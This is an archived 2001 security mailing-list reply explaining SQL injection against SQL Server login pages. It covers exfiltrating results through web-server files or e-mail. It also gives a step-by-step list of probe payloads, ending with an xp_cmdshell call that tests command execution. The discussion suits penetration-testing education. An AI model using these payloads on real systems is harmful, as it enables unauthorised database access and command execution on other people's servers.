RE: SQL

From: Javier Fernández-Sanguino (jfernandezat_private)
Date: Fri Nov 23 2001 - 01:15:17 PST

Next message: otanerat_private: "notes question"

Previous message: patrik.karlssonat_private: "iXsecurity.tool.ipr.1.0.0"
Maybe in reply to: Gary O'leary-Steele: "SQL"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> 
> Don't you need the returned recordset to be written to the 
> html stream in
> order to see anything useful?  For instance if you are just 
> looking at a
> login page you may not get any joy with appending extra 
> SELECTs?  We have
> just been playing with exactly this!
> 

	Not really, it depends on the system configuration. If you can
(and you quite probably can) run 'exec master.xp_cmdshell' you can have
the queries directed to files in the Web server (if you know its
location) and retrieve them from there. You can even (check the stored
procedures for SQL Server) send you mails with the results of the
queries or with execution results! (I did this once and was kind of fun)

	So, even if not shown inline that does not mean you cannot
retrieve any information, but you have to use alternative ways which
will work (or not) depending on the system's configuration and the
access to the permiter. 

	One easyway to determine if you are effectively executing code
is doing incremental tests:

1.- test with ' 
	ODBC error
2.- test with '-- 
	error? (depends on query)
3.- test with ',...fillin data.. ) -- 
	error?
(keep going until you get no errors, this, of course, is easier if you
know the code beforehand, there are many ISS vulns which will get you to
it...)
4.- test with ', ...data... ; select * from asdfadfas -- 
	Probable error since the table 'asdfadfas' does not exist
5.- test with ', ...data... ; select * from AVALIDSQLTABLE -- 
	No error since that table (take a look at default tables for SQL
server) does exist.
6.- test with ', .... data... ; exec master..xp_cmdshell 'dir',no_output
--
	No error? Then you are executing code. Check the error (if there
is one) since it might say that the user running the query cannot
execute stored procedures...


	Do you get the idea?

	Javi

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: otanerat_private: "notes question"
Previous message: patrik.karlssonat_private: "iXsecurity.tool.ipr.1.0.0"
Maybe in reply to: Gary O'leary-Steele: "SQL"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 23 2001 - 11:25:41 PST